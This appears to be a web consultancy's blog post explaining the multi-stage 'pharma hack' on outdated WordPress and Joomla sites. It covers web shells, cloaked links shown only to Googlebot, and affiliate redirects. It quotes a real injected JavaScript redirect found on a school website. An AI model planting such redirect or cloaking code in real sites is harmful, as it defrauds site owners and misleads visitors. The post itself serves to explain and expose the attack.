How Does The Pharma Hack Work

Sites running obsolete copies of popular Content Management Systems such as WordPress or Joomla and/or out of date add-ons within those CMS's are hacked all the time.

In more innocent times you would typically see your home page replaced with a message related to the hacker's cause.

The Pharma hack dates back three or more years, but for the last 12 months we have been monitoring a growing trend of 'invisible' hacks.  The hacker gains entry one way or another - as per old school hacking their first action is to upload some form of web-shell - or force one to load through a remote file inclusion vulnerability.

Next they make a subtle change - perhaps adding their target word to the homepage's title. As browsers don't show the title as they did before, this goes unnoticed by humans for a few weeks. Alternatively a new folder is created and populated within the file system.

Next - after Google is given time to recrawl the site and find these subtle changes and starts to climb up the search engine rankings for its new 'keywords' - a further stage of hacking takes place. Links are embedded within the site - and perhaps a bit of new content often linking out to hacked pages within the host site or within other sites.

Now this phase is clever - the hacks are cloaked and aren't visible to normal users.  Only Googlebot, Google's search engine crawler, receives the changed content - or a normal user who tricks the hacker code into thinking they are the search engine.

Now this interlinking and inter-promotion of hacked sites using these 'new keywords' promotes the whole network. The hackers are building potential future traffic for all of these sites - but as yet aren't gaining any direct benefit. It takes maybe another month, perhaps slightly more, for the whole network to 'ripen' ready for harvesting.

The final stage - the hacked sites are 're-hacked' with new code that will redirect 'normal' traffic landing on the hacked site off to the payoff site. This will typically be a semi-legitimate pharmaceuticals website that runs an affiliate scheme. This site gets sales, the hacker gets a commission fee. Here is some code lifted from one hacked site:

<script>
// <![CDATA[
function bl(){x = document.referrer;if ( (x.indexOf('viagra')!=-1)||(x.indexOf('VIAGRA')!=-1)||(x.indexOf('buy')!=-1)||(x.indexOf('Viagra')!=-1)||(x.indexOf('Buy')!=-1)||(x.indexOf('viagra')!=-1)) {location.replace("http://www.megarxpills.com/viagra.php?affid=34582011");}}bl();
// ]]>
</script>

This code has been lifted from a UK Catholic Girls High School (ages 11 - 16). See how inappropriate this is.

The code basically looks at any details the web browser brings with it about the referring website. If the word Viagra or buy is found in the url of the page that sent the visitor here traffic is sent to megarxpills.com to the viagra page and the credit (and therefore commission) goes to the affilliate with the id of 345822011

The site in question, mega rx pills .com have plausible deniability - they can claim that they didn't do the hack, they didn't authorise the hack. But - they don't make it easy to report these things. When you do you receive a standard reply back asserting that 'spam isn't something they can do anything about'. When I followed up asserting that I wasn't reporting email spam but hacked websites that link to them with an affiliate id clearly visible what response did I get?

None.


© Copyright 2002-2016
Dean Marshall Consultancy Ltd - all rights reserved
Registered in England and Wales, Company number 6615299
A team of professional developers specialising in custom Joomla development

Dean Marshall Consultancy - a Member of W3C Sites XHTML valid website valid CSS website design WAI conformant website design

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. This site is not affiliated with, or endorsed by, Open Source Matters or the Joomla! Project.